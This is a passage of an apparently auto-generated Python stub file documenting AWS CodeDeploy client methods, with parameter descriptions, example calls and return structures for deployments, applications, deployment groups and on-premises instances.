enabled (boolean) --Indicates whether a defined automatic rollback configuration is currently enabled.
events (list) --The event type or types that trigger a rollback.
(string) --
:type deploymentStyle: dict
:param deploymentStyle: Information about the type of deployment, in-place or blue/green, that you want to run and whether to route deployment traffic behind a load balancer.
deploymentType (string) --Indicates whether to run an in-place deployment or a blue/green deployment.
deploymentOption (string) --Indicates whether to route deployment traffic behind a load balancer.
:type blueGreenDeploymentConfiguration: dict
:param blueGreenDeploymentConfiguration: Information about blue/green deployment options for a deployment group.
terminateBlueInstancesOnDeploymentSuccess (dict) --Information about whether to terminate instances in the original fleet during a blue/green deployment.
action (string) --The action to take on instances in the original environment after a successful blue/green deployment.
TERMINATE: Instances are terminated after a specified wait time.
KEEP_ALIVE: Instances are left running after they are deregistered from the load balancer and removed from the deployment group.
terminationWaitTimeInMinutes (integer) --The number of minutes to wait after a successful blue/green deployment before terminating instances from the original environment.
deploymentReadyOption (dict) --Information about the action to take when newly provisioned instances are ready to receive traffic in a blue/green deployment.
actionOnTimeout (string) --Information about when to reroute traffic from an original environment to a replacement environment in a blue/green deployment.
CONTINUE_DEPLOYMENT: Register new instances with the load balancer immediately after the new application revision is installed on the instances in the replacement environment.
STOP_DEPLOYMENT: Do not register new instances with load balancer unless traffic is rerouted manually. If traffic is not rerouted manually before the end of the specified wait period, the deployment status is changed to Stopped.
waitTimeInMinutes (integer) --The number of minutes to wait before the status of a blue/green deployment changed to Stopped if rerouting is not started manually. Applies only to the STOP_DEPLOYMENT option for actionOnTimeout
greenFleetProvisioningOption (dict) --Information about how instances are provisioned for a replacement environment in a blue/green deployment.
action (string) --The method used to add instances to a replacement environment.
DISCOVER_EXISTING: Use instances that already exist or will be created manually.
COPY_AUTO_SCALING_GROUP: Use settings from a specified Auto Scaling group to define and create instances in a new Auto Scaling group.
:type loadBalancerInfo: dict
:param loadBalancerInfo: Information about the load balancer used in a deployment.
elbInfoList (list) --An array containing information about the load balancer in Elastic Load Balancing to use in a deployment.
(dict) --Information about a load balancer in Elastic Load Balancing to use in a deployment.
name (string) --For blue/green deployments, the name of the load balancer that will be used to route traffic from original instances to replacement instances in a blue/green deployment. For in-place deployments, the name of the load balancer that instances are deregistered from so they are not serving traffic during a deployment, and then re-registered with after the deployment completes.
:rtype: dict
:return: {
'deploymentGroupId': 'string'
}
"""
pass
def delete_application(applicationName=None):
"""
Deletes an application.
See also: AWS API Documentation
:example: response = client.delete_application(
applicationName='string'
)
:type applicationName: string
:param applicationName: [REQUIRED]
The name of an AWS CodeDeploy application associated with the applicable IAM user or AWS account.
"""
pass
def delete_deployment_config(deploymentConfigName=None):
"""
Deletes a deployment configuration.
See also: AWS API Documentation
:example: response = client.delete_deployment_config(
deploymentConfigName='string'
)
:type deploymentConfigName: string
:param deploymentConfigName: [REQUIRED]
The name of a deployment configuration associated with the applicable IAM user or AWS account.
"""
pass
def delete_deployment_group(applicationName=None, deploymentGroupName=None):
"""
Deletes a deployment group.
See also: AWS API Documentation
:example: response = client.delete_deployment_group(
applicationName='string',
deploymentGroupName='string'
)
:type applicationName: string
:param applicationName: [REQUIRED]
The name of an AWS CodeDeploy application associated with the applicable IAM user or AWS account.
:type deploymentGroupName: string
:param deploymentGroupName: [REQUIRED]
The name of an existing deployment group for the specified application.
:rtype: dict
:return: {
'hooksNotCleanedUp': [
{
'name': 'string',
'hook': 'string'
},
]
}
"""
pass
def deregister_on_premises_instance(instanceName=None):
"""
Deregisters an on-premises instance.
See also: AWS API Documentation
:example: response = client.deregister_on_premises_instance(
instanceName='string'
)
:type instanceName: string
:param instanceName: [REQUIRED]
The name of the on-premises instance to deregister.
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
ClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method's model.
"""
pass
def get_application(applicationName=None):
"""
Gets information about an application.
See also: AWS API Documentation
:example: response = client.get_application(
applicationName='string'
)
:type applicationName: string
:param applicationName: [REQUIRED]
The name of an AWS CodeDeploy application associated with the applicable IAM user or AWS account.
:rtype: dict
:return: {
'application': {
'applicationId': 'string',
'applicationName': 'string',
'createTime': datetime(2015, 1, 1),
'linkedToGitHub': True|False,
'gitHubAccountName': 'string'
}
}
"""
pass
def get_application_revision(applicationName=None, revision=None):
"""
Gets information about an application revision.
See also: AWS API Documentation
:example: response = client.get_application_revision(
applicationName='string',
revision={
'revisionType': 'S3'|'GitHub',
's3Location': {
'bucket': 'string',
'key': 'string',
'bundleType': 'tar'|'tgz'|'zip',
'version': 'string',
'eTag': 'string'
},
'gitHubLocation': {
'repository': 'string',
'commitId': 'string'
}
}
)
:type applicationName: string
:param applicationName: [REQUIRED]
The name of the application that corresponds to the revision.
:type revision: dict
:param revision: [REQUIRED]
Information about the application revision to get, including type and location.
revisionType (string) --The type of application revision:
S3: An application revision stored in Amazon S3.
GitHub: An application revision stored in GitHub.
s3Location (dict) --Information about the location of application artifacts stored in Amazon S3.
bucket (string) --The name of the Amazon S3 bucket where the application revision is stored.
key (string) --The name of the Amazon S3 object that represents the bundled artifacts for the application revision.
bundleType (string) --The file type of the application revision. Must be one of the following:
tar: A tar archive file.
tgz: A compressed tar archive file.
zip: A zip archive file.
version (string) --A specific version of the Amazon S3 object that represents the bundled artifacts for the application revision.
If the version is not specified, the system will use the most recent version by default.
eTag (string) --The ETag of the Amazon S3 object that represents the bundled artifacts for the application revision.
If the ETag is not specified as an input parameter, ETag validation of the object will be skipped.
gitHubLocation (dict) --Information about the location of application artifacts stored in GitHub.
repository (string) --The GitHub account and repository pair that stores a reference to the commit that represents the bundled artifacts for the application revision.
Specified as account/repository.
commitId (string) --The SHA1 commit ID of the GitHub commit that represents the bundled artifacts for the application revision.
:rtype: dict
:return: {
'applicationName': 'string',
'revision': {
'revisionType': 'S3'|'GitHub',
's3Location': {
'bucket': 'string',
'key': 'string',
'bundleType': 'tar'|'tgz'|'zip',
'version': 'string',
'eTag': 'string'
},
'gitHubLocation': {
'repository': 'string',
'commitId': 'string'
}
},
'revisionInfo': {
'description': 'string',
'deploymentGroups': [
'string',
],
'firstUsedTime': datetime(2015, 1, 1),
'lastUsedTime': datetime(2015, 1, 1),
'registerTime': datetime(2015, 1, 1)
}
}
:returns:
S3: An application revision stored in Amazon S3.
GitHub: An application revision stored in GitHub.
"""
pass
def get_deployment(deploymentId=None):
"""
Gets information about a deployment.
See also: AWS API Documentation
:example: response = client.get_deployment(
deploymentId='string'
)
:type deploymentId: string
:param deploymentId: [REQUIRED]
A deployment ID associated with the applicable IAM user or AWS account.
:rtype: dict
:return: {
'deploymentInfo': {
'applicationName': 'string',
'deploymentGroupName': 'string',
'deploymentConfigName': 'string',
'deploymentId': 'string',
'previousRevision': {
'revisionType': 'S3'|'GitHub',
's3Location': {
'bucket': 'string',
'key': 'string',
'bundleType': 'tar'|'tgz'|'zip',
'version': 'string',
'eTag': 'string'
},
'gitHubLocation': {
'repository': 'string',
'commitId': 'string'
}
},
'revision': {
'revisionType': 'S3'|'GitHub',
's3Location': {
'bucket': 'string',
'key': 'string',
'bundleType': 'tar'|'tgz'|'zip',
'version': 'string',
'eTag': 'string'
},
'gitHubLocation': {
'repository': 'string',
'commitId': 'string'
}
},
'status': 'Created'|'Queued'|'InProgress'|'Succeeded'|'Failed'|'Stopped'|'Ready',
'errorInformation': {
'code': 'DEPLOYMENT_GROUP_MISSING'|'APPLICATION_MISSING'|'REVISION_MISSING'|'IAM_ROLE_MISSING'|'IAM_ROLE_PERMISSIONS'|'NO_EC2_SUBSCRIPTION'|'OVER_MAX_INSTANCES'|'NO_INSTANCES'|'TIMEOUT'|'HEALTH_CONSTRAINTS_INVALID'|'HEALTH_CONSTRAINTS'|'INTERNAL_ERROR'|'THROTTLED'|'ALARM_ACTIVE'|'AGENT_ISSUE'|'AUTO_SCALING_IAM_ROLE_PERMISSIONS'|'AUTO_SCALING_CONFIGURATION'|'MANUAL_STOP',
'message': 'string'
},
'createTime': datetime(2015, 1, 1),
'startTime': datetime(2015, 1, 1),
'completeTime': datetime(2015, 1, 1),
'deploymentOverview': {
'Pending': 123,
'InProgress': 123,
'Succeeded': 123,
'Failed': 123,
'Skipped': 123,
'Ready': 123
},
'description': 'string',
'creator': 'user'|'autoscaling'|'codeDeployRollback',
'ignoreApplicationStopFailures': True|False,
'autoRollbackConfiguration': {
'enabled': True|False,
'events': [
'DEPLOYMENT_FAILURE'|'DEPLOYMENT_STOP_ON_ALARM'|'DEPLOYMENT_STOP_ON_REQUEST',
]
},
'updateOutdatedInstancesOnly': True|False,
'rollbackInfo': {
'rollbackDeploymentId': 'string',
'rollbackTriggeringDeploymentId': 'string',
'rollbackMessage': 'string'
},
'deploymentStyle': {
'deploymentType': 'IN_PLACE'|'BLUE_GREEN',
'deploymentOption': 'WITH_TRAFFIC_CONTROL'|'WITHOUT_TRAFFIC_CONTROL'
},
'targetInstances': {
'tagFilters': [
{
'Key': 'string',
'Value': 'string',
'Type': 'KEY_ONLY'|'VALUE_ONLY'|'KEY_AND_VALUE'
},
],
'autoScalingGroups': [
'string',
]
},
'instanceTerminationWaitTimeStarted': True|False,
'blueGreenDeploymentConfiguration': {
'terminateBlueInstancesOnDeploymentSuccess': {
'action': 'TERMINATE'|'KEEP_ALIVE',
'terminationWaitTimeInMinutes': 123
},
'deploymentReadyOption': {
'actionOnTimeout': 'CONTINUE_DEPLOYMENT'|'STOP_DEPLOYMENT',
'waitTimeInMinutes': 123
},
'greenFleetProvisioningOption': {
'action': 'DISCOVER_EXISTING'|'COPY_AUTO_SCALING_GROUP'
}
},
'loadBalancerInfo': {
'elbInfoList': [
{
'name': 'string'
},
]
},
'additionalDeploymentStatusInfo': 'string',
'fileExistsBehavior': 'DISALLOW'|'OVERWRITE'|'RETAIN'
}
}
:returns:
tar: A tar archive file.
tgz: A compressed tar archive file.
zip: A zip archive file.
"""
pass
def get_deployment_config(deploymentConfigName=None):
"""
Gets information about a deployment configuration.
See also: AWS API Documentation
:example: response = client.get_deployment_config(
deploymentConfigName='string'
)
:type deploymentConfigName: string
:param deploymentConfigName: [REQUIRED]
The name of a deployment configuration associated with the applicable IAM user or AWS account.
:rtype: dict
:return: {
'deploymentConfigInfo': {
'deploymentConfigId': 'string',
'deploymentConfigName': 'string',
'minimumHealthyHosts': {
'value': 123,
'type': 'HOST_COUNT'|'FLEET_PERCENT'
},
'createTime': datetime(2015, 1, 1)
}
}
"""
pass
def get_deployment_group(applicationName=None, deploymentGroupName=None):
"""
Gets information about a deployment group.
See also: AWS API Documentation
:example: response = client.get_deployment_group(
applicationName='string',
deploymentGroupName='string'
)
:type applicationName: string
:param applicationName: [REQUIRED]
The name of an AWS CodeDeploy application associated with the applicable IAM user or AWS account.
:type deploymentGroupName: string
:param deploymentGroupName: [REQUIRED]
The name of an existing deployment group for the specified application.
:rtype: dict
:return: {
'deploymentGroupInfo': {
'applicationName': 'string',
'deploymentGroupId': 'string',
'deploymentGroupName': 'string',
'deploymentConfigName': 'string',
'ec2TagFilters': [
{
'Key': 'string',
'Value': 'string',
'Type': 'KEY_ONLY'|'VALUE_ONLY'|'KEY_AND_VALUE'
},
],
'onPremisesInstanceTagFilters': [
{
'Key': 'string',
'Value': 'string',
'Type': 'KEY_ONLY'|'VALUE_ONLY'|'KEY_AND_VALUE'
},
],
'autoScalingGroups': [
{
'name': 'string',
'hook': 'string'
},
],
'serviceRoleArn': 'string',
'targetRevision': {
'revisionType': 'S3'|'GitHub',
's3Location': {
'bucket': 'string',
'key': 'string',
'bundleType': 'tar'|'tgz'|'zip',
'version': 'string',
'eTag': 'string'
},
'gitHubLocation': {
'repository': 'string',
'commitId': 'string'
}
},
'triggerConfigurations': [
{
'triggerName': 'string',
'triggerTargetArn': 'string',
'triggerEvents': [
'DeploymentStart'|'DeploymentSuccess'|'DeploymentFailure'|'DeploymentStop'|'DeploymentRollback'|'DeploymentReady'|'InstanceStart'|'InstanceSuccess'|'InstanceFailure'|'InstanceReady',
]
},
],
'alarmConfiguration': {
'enabled': True|False,
'ignorePollAlarmFailure': True|False,
'alarms': [
{
'name': 'string'
},
]
},
'autoRollbackConfiguration': {
'enabled': True|False,
'events': [
'DEPLOYMENT_FAILURE'|'DEPLOYMENT_STOP_ON_ALARM'|'DEPLOYMENT_STOP_ON_REQUEST',
]
},
'deploymentStyle': {
'deploymentType': 'IN_PLACE'|'BLUE_GREEN',
'deploymentOption': 'WITH_TRAFFIC_CONTROL'|'WITHOUT_TRAFFIC_CONTROL'
},
'blueGreenDeploymentConfiguration': {
'terminateBlueInstancesOnDeploymentSuccess': {
'action': 'TERMINATE'|'KEEP_ALIVE',
'terminationWaitTimeInMinutes': 123
},
'deploymentReadyOption': {
'actionOnTimeout': 'CONTINUE_DEPLOYMENT'|'STOP_DEPLOYMENT',
'waitTimeInMinutes': 123
},
'greenFleetProvisioningOption': {
'action': 'DISCOVER_EXISTING'|'COPY_AUTO_SCALING_GROUP'
}
},
'loadBalancerInfo': {
'elbInfoList': [
{
'name': 'string'
},
]
},
'lastSuccessfulDeployment': {
'deploymentId': 'string',
'status': 'Created'|'Queued'|'InProgress'|'Succeeded'|'Failed'|'Stopped'|'Ready',
'endTime': datetime(2015, 1, 1),
'createTime': datetime(2015, 1, 1)
},
'lastAttemptedDeployment': {
'deploymentId': 'string',
'status': 'Created'|'Queued'|'InProgress'|'Succeeded'|'Failed'|'Stopped'|'Ready',
'endTime': datetime(2015, 1, 1),
'createTime': datetime(2015, 1, 1)
}
}
}
:returns:
KEY_ONLY: Key only.
VALUE_ONLY: Value only.
KEY_AND_VALUE: Key and value.
"""
pass
def get_deployment_instance(deploymentId=None, instanceId=None):
"""
Gets information about an instance as part of a deployment.
See also: AWS API Documentation
:example: response = client.get_deployment_instance(
deploymentId='string',
instanceId='string'
)
:type deploymentId: string
:param deploymentId: [REQUIRED]
The unique ID of a deployment.
:type instanceId: string
:param instanceId: [REQUIRED]
The unique ID of an instance in the deployment group.
:rtype: dict
:return: {
'instanceSummary': {
'deploymentId': 'string',
'instanceId': 'string',
'status': 'Pending'|'InProgress'|'Succeeded'|'Failed'|'Skipped'|'Unknown'|'Ready',
'lastUpdatedAt': datetime(2015, 1, 1),
'lifecycleEvents': [
{
'lifecycleEventName': 'string',
'diagnostics': {
'errorCode': 'Success'|'ScriptMissing'|'ScriptNotExecutable'|'ScriptTimedOut'|'ScriptFailed'|'UnknownError',
'scriptName': 'string',
'message': 'string',
'logTail': 'string'
},
'startTime': datetime(2015, 1, 1),
'endTime': datetime(2015, 1, 1),
'status': 'Pending'|'InProgress'|'Succeeded'|'Failed'|'Skipped'|'Unknown'
},
],
'instanceType': 'Blue'|'Green'
}
}
:returns:
Pending: The deployment is pending for this instance.
In Progress: The deployment is in progress for this instance.
Succeeded: The deployment has succeeded for this instance.
Failed: The deployment has failed for this instance.
Skipped: The deployment has been skipped for this instance.
Unknown: The deployment status is unknown for this instance.
"""
pass
def get_on_premises_instance(instanceName=None):
"""
Gets information about an on-premises instance.
See also: AWS API Documentation
:example: response = client.get_on_premises_instance(
instanceName='string'
)
:type instanceName: string
:param instanceName: [REQUIRED]
The name of the on-premises instance about which to get information.
:rtype: dict
:return: {
'instanceInfo': {
'instanceName': 'string',
'iamSessionArn': 'string',
'iamUserArn': 'string',
'instanceArn': 'string',
'registerTime': datetime(2015, 1, 1),
'deregisterTime': datetime(2015, 1, 1),
'tags': [
{
'Key': 'string',
'Value': 'string'
},
]
}
}
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is create_foo, and you'd normally invoke the
operation as client.create_foo(**kwargs), if the
create_foo operation can be paginated, you can use the
call client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
"""
pass
def get_waiter():
"""
"""
pass
def list_application_revisions(applicationName=None, sortBy=None, sortOrder=None, s3Bucket=None, s3KeyPrefix=None, deployed=None, nextToken=None):
"""
Lists information about revisions for an application.
See also: AWS API Documentation
:example: response = client.list_application_revisions(
applicationName='string',
sortBy='registerTime'|'firstUsedTime'|'lastUsedTime',
sortOrder='ascending'|'descending',
s3Bucket='string',
s3KeyPrefix='string',
deployed='include'|'exclude'|'ignore',
nextToken='string'
)
:type applicationName: string
:param applicationName: [REQUIRED]
The name of an AWS CodeDeploy application associated with the applicable IAM user or AWS account.
:type sortBy: string
:param sortBy: The column name to use to sort the list results:
registerTime: Sort by the time the revisions were registered with AWS CodeDeploy.
firstUsedTime: Sort by the time the revisions were first used in a deployment.
lastUsedTime: Sort by the time the revisions were last used in a deployment.
If not specified or set to null, the results will be returned in an arbitrary order.
:type sortOrder: string
:param sortOrder: The order in which to sort the list results:
ascending: ascending order.
descending: descending order.
If not specified, the results will be sorted in ascending order.
If set to null, the results will be sorted in an arbitrary order.
:type s3Bucket: string
:param s3Bucket: An Amazon S3 bucket name to limit the search for revisions.
If set to null, all of the user's buckets will be searched.
:type s3KeyPrefix: string
:param s3KeyPrefix: A key prefix for the set of Amazon S3 objects to limit the search for revisions.
:type deployed: string
:param deployed: Whether to list revisions based on whether the revision is the target revision of an deployment group:
include: List revisions that are target revisions of a deployment group.
exclude: Do not list revisions that are target revisions of a deployment group.
ignore: List all revisions.
:type nextToken: string
:param nextToken: An identifier returned from the previous list application revisions call. It can be used to return the next set of applications in the list.
:rtype: dict
:return: {
'revisions': [
{
'revisionType': 'S3'|'GitHub',
's3Location': {
'bucket': 'string',
'key': 'string',
'bundleType': 'tar'|'tgz'|'zip',
'version': 'string',
'eTag': 'string'
},
'gitHubLocation': {
'repository': 'string',
'commitId': 'string'
}
},
],
'nextToken': 'string'
}
:returns:
S3: An application revision stored in Amazon S3.
GitHub: An application revision stored in GitHub.
"""
pass
def list_applications(nextToken=None):
"""
Lists the applications registered with the applicable IAM user or AWS account.
See also: AWS API Documentation
:example: response = client.list_applications(
nextToken='string'
)
:type nextToken: string
:param nextToken: An identifier returned from the previous list applications call. It can be used to return the next set of applications in the list.
:rtype: dict
:return: {
'applications': [
'string',
],
'nextToken': 'string'
}
"""
pass
def list_deployment_configs(nextToken=None):
"""
Lists the deployment configurations with the applicable IAM user or AWS account.
See also: AWS API Documentation
:example: response = client.list_deployment_configs(
nextToken='string'
)
:type nextToken: string
:param nextToken: An identifier returned from the previous list deployment configurations call. It can be used to return the next set of deployment configurations in the list.
:rtype: dict
:return: {
'deploymentConfigsList': [
'string',
],
'nextToken': 'string'
}
"""
pass
def list_deployment_groups(applicationName=None, nextToken=None):
"""
Lists the deployment groups for an application registered with the applicable IAM user or AWS account.
See also: AWS API Documentation
:example: response = client.list_deployment_groups(
applicationName='string',
nextToken='string'
)
:type applicationName: string
:param applicationName: [REQUIRED]
The name of an AWS CodeDeploy application associated with the applicable IAM user or AWS account.
:type nextToken: string
:param nextToken: An identifier returned from the previous list deployment groups call. It can be used to return the next set of deployment groups in the list.
:rtype: dict
:return: {
'applicationName': 'string',
'deploymentGroups': [
'string',
],
'nextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_deployment_instances(deploymentId=None, nextToken=None, instanceStatusFilter=None, instanceTypeFilter=None):
"""
Lists the instance for a deployment associated with the applicable IAM user or AWS account.
See also: AWS API Documentation
:example: response = client.list_deployment_instances(
deploymentId='string',
nextToken='string',
instanceStatusFilter=[
'Pending'|'InProgress'|'Succeeded'|'Failed'|'Skipped'|'Unknown'|'Ready',
],
instanceTypeFilter=[
'Blue'|'Green',
]
)
:type deploymentId: string
:param deploymentId: [REQUIRED]
The unique ID of a deployment.
:type nextToken: string
:param nextToken: An identifier returned from the previous list deployment instances call. It can be used to return the next set of deployment instances in the list.
:type instanceStatusFilter: list
:param instanceStatusFilter: A subset of instances to list by status:
Pending: Include those instance with pending deployments.
InProgress: Include those instance where deployments are still in progress.
Succeeded: Include those instances with successful deployments.
Failed: Include those instance with failed deployments.
Skipped: Include those instance with skipped deployments.
Unknown: Include those instance with deployments in an unknown state.
(string) --
:type instanceTypeFilter: list
:param instanceTypeFilter: The set of instances in a blue/green deployment, either those in the original environment ('BLUE') or those in the replacement environment ('GREEN'), for which you want to view instance information.
(string) --
:rtype: dict
:return: {
'instancesList': [
'string',
],
'nextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_deployments(applicationName=None, deploymentGroupName=None, includeOnlyStatuses=None, createTimeRange=None, nextToken=None):
"""
Lists the deployments in a deployment group for an application registered with the applicable IAM user or AWS account.
See also: AWS API Documentation
:example: response = client.list_deployments(
applicationName='string',
deploymentGroupName='string',
includeOnlyStatuses=[
'Created'|'Queued'|'InProgress'|'Succeeded'|'Failed'|'Stopped'|'Ready',
],
createTimeRange={
'start': datetime(2015, 1, 1),
'end': datetime(2015, 1, 1)
},
nextToken='string'
)
:type applicationName: string
:param applicationName: The name of an AWS CodeDeploy application associated with the applicable IAM user or AWS account.
:type deploymentGroupName: string
:param deploymentGroupName: The name of an existing deployment group for the specified application.
:type includeOnlyStatuses: list
:param includeOnlyStatuses: A subset of deployments to list by status:
Created: Include created deployments in the resulting list.
Queued: Include queued deployments in the resulting list.
In Progress: Include in-progress deployments in the resulting list.
Succeeded: Include successful deployments in the resulting list.
Failed: Include failed deployments in the resulting list.
Stopped: Include stopped deployments in the resulting list.
(string) --
:type createTimeRange: dict
:param createTimeRange: A time range (start and end) for returning a subset of the list of deployments.
start (datetime) --The start time of the time range.
Note
Specify null to leave the start time open-ended.
end (datetime) --The end time of the time range.
Note
Specify null to leave the end time open-ended.
:type nextToken: string
:param nextToken: An identifier returned from the previous list deployments call. It can be used to return the next set of deployments in the list.
:rtype: dict
:return: {
'deployments': [
'string',
],
'nextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_git_hub_account_token_names(nextToken=None):
"""
Lists the names of stored connections to GitHub accounts.
See also: AWS API Documentation
:example: response = client.list_git_hub_account_token_names(
nextToken='string'
)
:type nextToken: string
:param nextToken: An identifier returned from the previous ListGitHubAccountTokenNames call. It can be used to return the next set of names in the list.
:rtype: dict
:return: {
'tokenNameList': [
'string',
],
'nextToken': 'string'
}
"""
pass
def list_on_premises_instances(registrationStatus=None, tagFilters=None, nextToken=None):
"""
Gets a list of names for one or more on-premises instances.
Unless otherwise specified, both registered and deregistered on-premises instance names will be listed. To list only registered or deregistered on-premises instance names, use the registration status parameter.
See also: AWS API Documentation
:example: response = client.list_on_premises_instances(
registrationStatus='Registered'|'Deregistered',
tagFilters=[
{
'Key': 'string',
'Value': 'string',
'Type': 'KEY_ONLY'|'VALUE_ONLY'|'KEY_AND_VALUE'
},
],
nextToken='string'
)
:type registrationStatus: string
:param registrationStatus: The registration status of the on-premises instances:
Deregistered: Include deregistered on-premises instances in the resulting list.
Registered: Include registered on-premises instances in the resulting list.
:type tagFilters: list
:param tagFilters: The on-premises instance tags that will be used to restrict the corresponding on-premises instance names returned.
(dict) --Information about an on-premises instance tag filter.
Key (string) --The on-premises instance tag filter key.
Value (string) --The on-premises instance tag filter value.
Type (string) --The on-premises instance tag filter type:
KEY_ONLY: Key only.
VALUE_ONLY: Value only.
KEY_AND_VALUE: Key and value.
:type nextToken: string
:param nextToken: An identifier returned from the previous list on-premises instances call. It can be used to return the next set of on-premises instances in the list.
:rtype: dict
:return: {
'instanceNames': [
'string',
],
'nextToken': 'string'
}
:returns:
(string) --
"""
pass
def register_application_revision(applicationName=None, description=None, revision=None):
"""
Registers with AWS CodeDeploy a revision for the specified application.
See also: AWS API Documentation
:example: response = client.register_application_revision(
applicationName='string',
description='string',
revision={
'revisionType': 'S3'|'GitHub',
's3Location': {
'bucket': 'string',
'key': 'string',
'bundleType': 'tar'|'tgz'|'zip',
'version': 'string',
'eTag': 'string'
},
'gitHubLocation': {
'repository': 'string',
'commitId': 'string'
}
}
)
:type applicationName: string
:param applicationName: [REQUIRED]
The name of an AWS CodeDeploy application associated with the applicable IAM user or AWS account.
:type description: string
:param description: A comment about the revision.
:type revision: dict
:param revision: [REQUIRED]
Information about the application revision to register, including type and location.
revisionType (string) --The type of application revision:
S3: An application revision stored in Amazon S3.
GitHub: An application revision stored in GitHub.
s3Location (dict) --Information about the location of application artifacts stored in Amazon S3.
bucket (string) --The name of the Amazon S3 bucket where the application revision is stored.
key (string) --The name of the Amazon S3 object that represents the bundled artifacts for the application revision.
bundleType (string) --The file type of the application revision. Must be one of the following:
tar: A tar archive file.
tgz: A compressed tar archive file.
zip: A zip archive file.
version (string) --A specific version of the Amazon S3 object that represents the bundled artifacts for the application revision.
If the version is not specified, the system will use the most recent version by default.
eTag (string) --The ETag of the Amazon S3 object that represents the bundled artifacts for the application revision.
If the ETag is not specified as an input parameter, ETag validation of the object will be skipped.
gitHubLocation (dict) --Information about the location of application artifacts stored in GitHub.
repository (string) --The GitHub account and repository pair that stores a reference to the commit that represents the bundled artifacts for the application revision.
Specified as account/repository.
commitId (string) --The SHA1 commit ID of the GitHub commit that represents the bundled artifacts for the application revision.
"""
pass
def register_on_premises_instance(instanceName=None, iamSessionArn=None, iamUserArn=None):
"""
Registers an on-premises instance.
See also: AWS API Documentation
:example: response = client.register_on_premises_instance(
instanceName='string',
iamSessionArn='string',
iamUserArn='string'
)
:type instanceName: string
:param instanceName: [REQUIRED]
The name of the on-premises instance to register.
:type iamSessionArn: string
:param iamSessionArn: The ARN of the IAM session to associate with the on-premises instance.
:type iamUserArn: string
:param iamUserArn: The ARN of the IAM user to associate with the on-premises instance.
"""
pass
def remove_tags_from_on_premises_instances(tags=None, instanceNames=None):
"""
Removes one or more tags from one or more on-premises instances.
See also: AWS API Documentation
:example: response = client.remove_tags_from_on_premises_instances(
tags=[
{
'Key': 'string',
'Value': 'string'
},
],
instanceNames=[
'string',
]
)
:type tags: list
:param tags: [REQUIRED]
The tag key-value pairs to remove from the on-premises instances.
(dict) --Information about a tag.
Key (string) --The tag's key.
Value (string) --The tag's value.
:type instanceNames: list
:param instanceNames: [REQUIRED]
The names of the on-premises instances from which to remove tags.
(string) --
"""
pass
def skip_wait_time_for_instance_termination(deploymentId=None):
"""
In a blue/green deployment, overrides any specified wait time and starts terminating instances immediately after the traffic routing is completed.
See also: AWS API Documentation
:example: response = client.skip_wait_time_for_instance_termination(
deploymentId='string'
)
:type deploymentId: string
:param deploymentId: The ID of the blue/green deployment for which you want to skip the instance termination wait time.
"""
pass
def stop_deployment(deploymentId=None, autoRollbackEnabled=None):
"""
Attempts to stop an ongoing deployment.
See also: AWS API Documentation
:example: response = client.stop_deployment(
deploymentId='string',
autoRollbackEnabled=True|False
)
:type deploymentId: string
:param deploymentId: [REQUIRED]
The unique ID of a deployment.
:type autoRollbackEnabled: boolean
:param autoRollbackEnabled: Indicates, when a deployment is stopped, whether instances that have been updated should be rolled back to the previous version of the application revision.
:rtype: dict
:return: {
'status': 'Pending'|'Succeeded',
'statusMessage': 'string'
}
:returns:
Pending: The stop operation is pending.
Succeeded: The stop operation was successful.
"""
pass
def update_application(applicationName=None, newApplicationName=None):
"""
Changes the name of an application.
See also: AWS API Documentation
:example: response = client.update_application(
applicationName='string',
newApplicationName='string'
)
:type applicationName: string
:param applicationName: The current name of the application you want to change.
:type newApplicationName: string
:param newApplicationName: The new name to give the application.
"""
pass
def update_deployment_group(applicationName=None, currentDeploymentGroupName=None, newDeploymentGroupName=None, deploymentConfigName=None, ec2TagFilters=None, onPremisesInstanceTagFilters=None, autoScalingGroups=None, serviceRoleArn=None, triggerConfigurations=None, alarmConfiguration=None, autoRollbackConfiguration=None, deploymentStyle=None, blueGreenDeploymentConfiguration=None, loadBalancerInfo=None):
"""
Changes information about a deployment group.
See also: AWS API Documentation
:example: response = client.update_deployment_group(
applicationName='string',
currentDeploymentGroupName='string',
newDeploymentGroupName='string',
deploymentConfigName='string',
ec2TagFilters=[
{
'Key': 'string',
'Value': 'string',
'Type': 'KEY_ONLY'|'VALUE_ONLY'|'KEY_AND_VALUE'
},
],
onPremisesInstanceTagFilters=[
{
'Key': 'string',
'Value': 'string',
'Type': 'KEY_ONLY'|'VALUE_ONLY'|'KEY_AND_VALUE'
},
],
autoScalingGroups=[
'string',
],
serviceRoleArn='string',
triggerConfigurations=[
{
'triggerName': 'string',
'triggerTargetArn': 'string',
'triggerEvents': [
'DeploymentStart'|'DeploymentSuccess'|'DeploymentFailure'|'DeploymentStop'|'DeploymentRollback'|'DeploymentReady'|'InstanceStart'|'InstanceSuccess'|'InstanceFailure'|'InstanceReady',
]
},
],
alarmConfiguration={
'enabled': True|False,
'ignorePollAlarmFailure': True|False,
'alarms': [
{
'name': 'string'
},
]
},
autoRollbackConfiguration={
'enabled': True|False,
'events': [
'DEPLOYMENT_FAILURE'|'DEPLOYMENT_STOP_ON_ALARM'|'DEPLOYMENT_STOP_ON_REQUEST',
]
},
deploymentStyle={
'deploymentType': 'IN_PLACE'|'BLUE_GREEN',
'deploymentOption': 'WITH_TRAFFIC_CONTROL'|'WITHOUT_TRAFFIC_CONTROL'
},
blueGreenDeploymentConfiguration={
'terminateBlueInstancesOnDeploymentSuccess': {
'action': 'TERMINATE'|'KEEP_ALIVE',
'terminationWaitTimeInMinutes': 123
},
'deploymentReadyOption': {
'actionOnTimeout': 'CONTINUE_DEPLOYMENT'|'STOP_DEPLOYMENT',
'waitTimeInMinutes': 123
},
'greenFleetProvisioningOption': {
'action': 'DISCOVER_EXISTING'|'COPY_AUTO_SCALING_GROUP'
}
},
loadBalancerInfo={
'elbInfoList': [
{
'name': 'string'
},
]
}
)
